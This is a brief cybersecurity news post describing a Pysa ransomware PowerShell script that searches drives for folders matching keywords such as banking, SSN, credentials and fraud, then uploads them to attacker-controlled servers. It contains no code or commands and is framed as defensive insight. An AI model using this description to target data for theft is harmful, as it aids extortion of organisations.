Last Updated on 22/11/2021 by Khushi
Hackers in today’s world are getting evolved and they are enhancing their tools and techniques. BleepingComputer together with MalwareHunterTeam shared a script used by a ransomware group, Pysa that operates its malicious practices by using a PowerShell script to infiltrate in targeted networks.
PowerShell is a scripting language which is commonly used for automating the management of systems. Sometimes it is used for hacking purposes. Before encrypting data and application manual sweep of data, hackers use this script, which is designed in such a way that it scans each drive looking for data folders that match specific strings enlisted in the script. After the folder matches with the string, the script uploads those folders to a remote network which is under the attacker’s control.
The script shared by MalwareHunterTeam includes about 123 keywords that the script searches for. This script benefits the cyber security members and organisations as it gives them an insight about what kind of data a hacker finds valuable. The list, as expected, searches for files that are important for a firm and that can be used as valuable leverage such as financial and personal information of a company including audit and banking information, SSN, tax forms, credentials, SEC documents. The script also searches for keywords like secret, hidden, illegal, fraud, crime, federal, etc. The full list of keywords targeted by threat actors is given below.
The list definitely doesn’t guarantee us a “free from hack” system. However, with knowing what data might get targeted, we get a head start as we can apply some countermeasures.
